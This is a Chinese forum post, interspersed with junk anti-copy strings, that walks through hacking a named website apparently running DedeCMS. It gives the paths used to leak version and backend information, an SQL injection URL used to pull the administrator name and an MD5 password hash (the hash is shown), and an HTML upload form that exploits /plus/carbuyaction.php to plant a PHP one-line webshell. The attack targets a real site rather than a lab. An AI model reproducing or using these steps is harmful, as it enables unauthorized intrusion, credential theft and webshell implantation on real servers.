①注入漏洞。
8 Y* q) }% I* J% @; {9 I6 A5 D) ?这站 http://www.political-security.com/
6 `( v$ Z& Q+ G: ?6 |3 R首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,* N; e, k( k4 A' o* ~# }0 \# H% v
www.political-security.com/data/mysql_error_trace.inc 爆后台
0 x( B; V4 c* c# H' D5 x; ?然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。( P' e4 A8 j; x% k& w
然后写上语句 2 r7 _. I+ f" j
查看管理员帐号# W0 n/ m# x+ D$ P" J/ R
http://www.political-security.co ... &membergroup=@`
( N# }! J* P+ y# {( ?
: h$ ^6 H, J! |: kadmin 5 n* t4 J$ P' b5 c$ f
$ H2 u% G O% N2 S" p$ x查看管理员密码* t- T7 a1 r% o6 ?* E$ J( Q
http://www.political-security.co ... &membergroup=@`
3 N A$ m$ ^# H/ E
; C+ q8 e& G! z1 R6 Y7 y N! M8d29b1ef9f8c5a5af429
( G) \1 a/ Y* f: s) K9 H1 ~- c' B" c% j* w8 w6 v5 X- E/ I
查看管理员密码
- \4 v7 n+ N% f. \8 |# ]0 H
, F/ J; @! I* e' |7 \4 |( K得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
, H4 `9 {! m$ M* @, g
/ K8 ^; O$ v3 x, z5 l4 C8d2
% _# Z5 o: l# q1 H! T' }9b1ef9f8c5a5af422 p3 e M! A6 U! K6 P( B* t. s# o+ Q
9
6 P5 @1 M/ R* K& I# C( y
. V, J5 ]6 K5 g- `" Pcmd5没解出来 只好测试第二个方法' m3 N1 n/ f' R. G1 T' ?' \
6 V2 G8 f# S0 z: i7 r' v+ T( E3 _* F+ X Q
②上传漏洞:
/ v" J8 Y& K6 G" q1 R2 z1 R+ U' {" a( w
只要登陆会员中心,然后访问页面链接
0 K" G/ @1 h, }% g0 e9 V; {& \0 {9 Q“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
- M7 i2 E4 \- {- ^! A' N* M" p! A* }* d; b( y8 X
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
# D/ M. Q+ v; n; G" |$ F% i
% X9 a% y+ }% M) N$ g于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
& w6 g) n1 A6 B5 O
. Z% P8 H6 y- C1 A<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>/ ?7 T& A' w- j9 V |3 O. M1 g" R6 [. B; u
或者7 h( z: n& w/ B
即可上传成功 |